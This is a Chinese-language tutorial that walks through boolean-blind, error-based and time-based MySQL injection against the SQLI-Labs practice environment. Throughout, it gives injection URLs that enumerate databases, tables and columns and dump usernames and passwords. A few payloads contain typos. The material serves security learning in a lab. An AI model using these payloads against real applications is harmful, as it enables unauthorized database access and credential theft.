Tip: 这篇详细分解了盲注/报错/时间延迟注入等三种注入,并在测试环境SQLI-Labs中实现注入;这里说下,SQLI-Labs相比大家都知道其内部实验主要关注SQL注入,且分类众多,对于想学习手工注入、SQL注入可以本地搭建环境进行测试;

一、布尔盲注 二、报错注入 三、时间盲注
left()函数 count()&floor(rand())&group by sleep()函数
ascii()和substr函数 EXP()函数 if(condition,true,false)
ord()函数&mid()函数 bigint溢出
regexp正则 xpath报错注入:extractvalue()、updataxml()

一、布尔盲注

1.1.left()

格式:left(str,1)>5

解析:str是字符串,可能是版本号,可能是数据库名等;数字1:指的是从字符串中获取第一个字符,如果想获取第二个字符,直接修改次数字就行,但,注意:后面比较的数字要写上我们探测的第一个字符信息.

示例:
Database()='security'实际值;
Left(database(),1)>'s' 没有爆错并测出第一个字符是's'
Left(database(),2)>'sh' 需要加第一个字符,否则会爆错的;注意啦啦啦;

1.1.1.猜测当前数据库

1.1.1.1.猜测第一个字符

URL:猜测第一个字符是否大于'i'字符
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)>'i'--+
URL:确定第一个字符是s
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)='s'--+

1.1.1.2.猜解第二个字符

URL:必须添加第一个字符,以便进行猜解第二个字符;
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),2)='se'--+
URL:没有第九个字符,会直接报错,如下面URL.
http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),9)>'securitya'--+

1.1.2.猜测其他数据库

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit
0,1),1)='i'--+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit
0,1),12)='information_'--+

1.1.2.猜测数据库security表名,第一张表

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where
table_schema='security' limit 0,1),1)='e'--+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where
table_schema='security' limit 0,1),3)=‘ema’--+

1.1.3.猜测数据库security表名,第二张表

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where
table_schema='security' limit 1,1),1)='r'--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where
table_schema='security' limit 1,1),2)='re'--+

其他测试可自行继续猜解其他表,其中包含:users等表,具体不作实操;

1.1.4.猜表users字点名

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where
table_name='users' limit 0,1),1)='i'--+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where
table_name='users' limit 0,1),2)='id'--+

其他字段名:id、username、password

1.1.5.猜字段内数据

URL:注意:第一个username是D,大写字符,但是这里无法区分大小写;
http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),1)='d'--+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),2)='du'--+

建议:这里不要使用此函数进行猜解,因为无法判断字符哪里是大写哪里是小写的字符;建议使用下面ascii码来判断字符信息;其他部分就不继续猜解,因为字符中存在大小写区分;

1.2.ascii()&substr函数

格式:
ascii(string)>ascii码           ascii转换作用,并与外部进行比较;
substr(string,start,length) 从字符串开始的数字,取出长度为length长度的字符;

下面就利用此paylaod进行获取库中表名:

ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
//注意:database()已经通过以上方式可以获得;

ASCII码对照表:http://ascii.911cha.com/

1.2.1.猜解当前数据库名:第一个字符

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),1,1))=115 --+
其他URL:101—>'e'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),2,1))=101 --+

注意:超出字符长度时,设置最小ascii字符,也会报错,说明字符已经猜解完毕;

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),9,1))>65 --+

1.2.2.猜表名,第一张表,第一个字符

URL:101—>'e'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 0,1),1,1))=101 --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 0,1),2,1))=109 --+

和上面一样修改部分数字即可;表名:users、emails等:

1.2.4.猜解users表字段名:第一个字符

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where
table_name='users' limit 0,1),1,1))=105 --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where
table_name='users' limit 0,1),2,1))=100 --+

其他部分不作测试,列名:id、admin、username、password等,我们主要以username和password两列为主;

1.2.5.猜字段数据,username和password;第一个字符

URL:注意:我们在使用left函数时,出现无法识别其大小写;68—>'D'
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select username from security.users limit 0,1),1,1))=68 --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select username from security.users limit 0,1),2,1))=117--+

1.3.ord()函数&mid()函数

通过以上布尔型盲注后可以获取数据库、表和字段名等信息;其实ord和mid函数的作用和上面我们说的ascii和substr函数一致;

格式:
ord(string)     对获取的字符进行ascii码转换;
mid((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1)    截取字段中第一行的第一个字符;
mid(column_name,start[,length])

1.3.1.爆当前链接数据库,第一个字符

URL:第一个字符的ASCII码
http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),1,1))=115--+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),2,1))=101--+

后续的注入语句可以参考上面;

1.4.regexp正则

通过上面方法我们已经获取数据库和表,此时就是获取字段信息;而,正则表达式法,主要是利用布尔型进行模糊匹配;

格式:regexp '^…'
regexp ‘^…'  and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)
--+

1.4.1.猜当前数据库名

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[a-z]' limit 0,1) --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[s-s]' limit 0,1) --+

1.4.2.猜解数据库中表名

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and
table_name regexp '^[a-s]' limit 0,1) --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and
table_name regexp '^[e-e]' limit 0,1) --+

1.4.3.猜解列名

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.columns where table_name='users' and
column_name regexp '^[a-z]' limit 0,1) --+

其他部分请自行继续.

二、报错注入

2.1.count()、floor(rand())和group by报错

count(*)、floor(rand(0)*2)和group by的报错原理已经进行分析,可以参考后续:《Mysql注入之报错注入学习与分析->floor、count、group by》具体的语句构造可以参考下面的方式进行..这里省略了注入判断部分.

2.1.0.数据库当前账户

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2))a from
information_schema.columns group by a --+

2.1.1.爆库

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from 
information_schema.schemata limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from
information_schema.schemata limit 6,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.2.爆表

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from
information_schema.tables where table_schema='security' limit 0,1),0x3a,floor(rand(0)*2))a from
information_schema.columns group by a --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from
information_schema.tables where table_schema='security' limit 3,1),0x3a,floor(rand(0)*2))a from
information_schema.columns group by a --+

2.1.3.爆字段

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from
information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns
group by a --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from
information_schema.columns where table_name='users' limit 2,1),0x3a,floor(rand(0)*2))a from information_schema.columns
group by a --+

2.1.4.爆字段内数据

URL:这里payload只能爆出一列字段信息
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,scount(*),concat(0x3a,(select username from security.users limit
0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select password from security.users limit
0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.1.5.爆字段数据(两列数据显示)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(SELECT distinct
concat(0x3a,username,0x3a,password,0x3a) FROM security.users limit 0,1),0x3a,floor(rand(0)*2))a from
information_schema.columns group by a --+
其他URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select distinct
concat(0x3a,username,0x3a,password,0x3a) FROM security.users limit 1,1),0x3a,floor(rand(0)*2))a from
information_schema.columns group by a --+

注意:这里paylaod和只爆一列数据的paylaod的不同在于其password处修改为:distinct concat(password,username)来获取两列数据

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select distinct concat(0x3a,username,0x3a,password,0x3a) FROM security.users limit 1,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+

2.2.EXP()函数报错

EXP(x) 返回值e(自然对数的底)的x次方;如果不懂的,可以看这篇文章:《Mysql注入之exp报错注入》

URL:备注:使用EXP函数进行报错时,必须得知列长,如:这里是id、username、password三列

http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+

如果列数量不对时会报错;

URL:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),3--+

2.2.1.爆库

第一个数据库:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from
information_schema.schemata limit 0,1)a))),2,3--+
第二个数据库:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from
information_schema.schemata limit 1,1)a))),2,3--+
第三个数据库:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from
information_schema.schemata limit 2,1)a))),2,3--+
第四个数据库:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from
information_schema.schemata limit 3,1)a))),2,3--+
第五个数据库:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from
information_schema.schemata limit 4,1)a))),2,3--+

2.2.2.爆表

第一张表:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from
information_schema.tables where table_schema='security' limit 0,1)a))),2,3--+
第三张表:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from
information_schema.tables where table_schema='security' limit 2,1)a))),2,3--+

2.2.3.爆字段

第一个字段名:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT column_name from
information_schema.columns where table_name='users' limit 0,1)a))),2,3--+
第三个字段:
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT column_name from
information_schema.columns where table_name='users' limit 2,1)a))),2,3--+

2.2.4.爆字段数据(爆单列数据内容)

第一列数据:注意:这里只是爆出username列;
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit
0,1)a))),2,3 --+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit
1,1)a))),2,3 --+

2.2.5.爆两列数据

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct
concat(0x3a,username,0x3a,password) from security.users limit 0,1)a))),2,3 --+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct
concat(0x3a,username,0x3a,password) from security.users limit 1,1)a))),2,3 --+

2.3.bigint溢出

具体产生原理可以阅读《mysql注入之bigint溢出报错注入》其中已经介绍完备;

2.3.1.爆当前连接数据库

URl:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select database())x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select user())x) - ~0),2,3--+

2.3.2.爆库

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from
information_schema.schemata limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from
information_schema.schemata limit 6,1)x) - ~0),2,3--+

2.3.3.爆表

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables
where table_schema='security' limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables
where table_schema='security' limit 1,1)x) - ~0),2,3--+

2.3.4.爆字段名(表:users)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns
where table_name='users' limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns
where table_name='users' limit 1,1)x) - ~0),2,3--+

2.3.5.爆字段数据(user和password两列)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 0,1)x) -
~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 1,1)x) -
~0),2,3--+

2.3.6.爆字段数据(双字段数据)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select distinct
concat(0x3a,username,0x3a,password) from security.users limit 0,1)x) - ~0),2,3--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select distinct
concat(0x3a,username,0x3a,password) from security.users limit 1,1)x) - ~0),2,3--+

2.4.Xpath报错注入

主要的是extractvalue函数只要两个参数哦,updatexml是3个,所以在进行构造语句时需要注意;

2.4.1.Xpath注入之extractvalue函数

mysql> select extractvalue(1,concat(0x7e,(select database()),0x7e));

2.4.1.1.爆出当前链接数据库

URL:
http://sqli-labs.me:8888/Less-6/?id=1” and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select user()),0x7e))--+

2.4.1.2.爆库

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select schema_name from
information_schema.schemata limit 0,1),0x7e))--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select schema_name from
information_schema.schemata limit 6,1),0x7e))--+

2.4.1.3.爆表

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables
where table_schema='security' limit 0,1),0x7e))--+

其他测试部分自行修改尝试即可.

2.4.1.4.爆字段

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select column_name from
information_schema.columns where table_name='users' limit 0,1),0x7e))--+

2.4.1.5.爆数据(爆单字段数据)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit
0,1),0x7e))--+

2.4.1.6.爆双字段数据(username、password)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select distinct
concat(0x3a,username,0x3a,password) from security.users limit 1,1),0x7e))--+

2.4.2.Xpath注入之updatexml()函数

2.4.2.1.爆当前数据库名

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

2.4.2.3.爆数据库中表名(数据库以security)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables
where table_schema='security' limit 0,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables
where table_schema='security' limit 1,1),0x7e),1)--+

2.4.2.4.爆表中字段名(爆表users中字段名)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns
where table_name='users' limit 0,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns
where table_name='users' limit 1,1),0x7e),1)--+

2.4.2.5.爆出字段内数据(单个数据字段数据信息)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit
0,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 
1,1),0x7e),1)--+

2.4.2.6.爆字段数据信息(两列数据信息)

URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select distinct concat(0x3a,username,0x3a,password)
from security.users limit 1,1),0x7e),1)--+
URL:
http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select distinct concat(0x3a,username,0x3a,password)
from security.users limit 2,1),0x7e),1)--+

三、时间盲注

时间盲注会称为延时注入,利用页面反回结果所用时间来判断注入是否存在和后期注入进行;
延时注入是主要针对页面请求时间变化,无法用布尔真假判断、无法报错的情况下的注入技术.
延时注入作为最精准的注入,但是缺点明显——耗时长要想利用延时注.
延迟注入常见函数:
sleep() //延时
if(condition,true,false) //条件语句
ascii()=ascii码 //转换成ascii码
substr("string",strart,length) //mid()也一样,取出字符串里的第几位开始,长度多少的字符.
原理: 延时注入的原理就是,所要爆的信息的ascii码正确时,产生延时,否则不延时。实例如下所示; 解析:
0、mysql> select if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1);
1、select schema_name from information_schema.schemata limit 0,1 //取出数据库中第一个数据库,
2、substr(‘string’,1,1) //取出字符串,从第一个字符开始,长度为1,也就是第一个字母/字符
3、ascii(substr())=ascii码 //对字母/字符进行ascii编码并比较;
4、if(step1,1,sleep(5)) //如果第一个ascii编码的条件正确,会执行sleep()出现延时几秒,如果条件错误,则会在结果中输出1,可以看到上图的执行结果;
总结:可以再结合报错注入去猜解服务中数据库、表等信息;当然,延时注入也有不足之处太麻烦,但是较为准确基本能够确定字符;

3.1.时间盲注实战

这里采用Sqli-Labs中Less-10的实验来实战测试,为了更能体现出效果所以在延迟注入时,浏览器出现加载信息时出现延迟加载现象,或可以使用Burpsuite工具.

3.1.1.访问Less-10

URL:
http://sqli-labs.me:8888/Less-10/?id=1

3.1.2.尝试双引号测试注入

URL:浏览器出现延时,注意网络稳定性,不然会出现混淆;
http://sqli-labs.me:8888/Less-10/?id=1" and sleep(5)--+

3.1.3.猜解当前数据库名,第一个字符

URL:115—>s
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid(database(),1,1))=115,sleep(5),1)--+

3.1.4.猜解数据库名第二个字符

URL:101—>e
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid(database(),2,1))=101,sleep(5),1)--+

剩余部分不作继续;数据库:security<这里可以使用Burpsuite,Repeater功能测试>

3.1.5.猜解数据库表名,第一张表,第一个字符;

URL:101—>e
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select table_name from information_schema.tables where
table_schema='security' limit 0,1),1,1))=101,sleep(5),1)--+

其余也不做介绍,其中表有:emails、users等

3.1.6.猜解users表的字段名;第一个字段,第一个字符

URL:105—>i
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select column_name from information_schema.columns where
table_name='users' limit 0,1),1,1))=105,sleep(5),1)--+

其部分自行测试,只需修改部分数字即可;字段名:id、username、password

3.1.7.猜解字段数据,username中第一个字符

URl:68—>D
http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select username from security.users limit
0,1),1,1))=68,sleep(5),1)--+

其他字段信息请自行搭建环境测试,

© Copyright 2019  

Powered by  si1ent  

皖ICP备19004273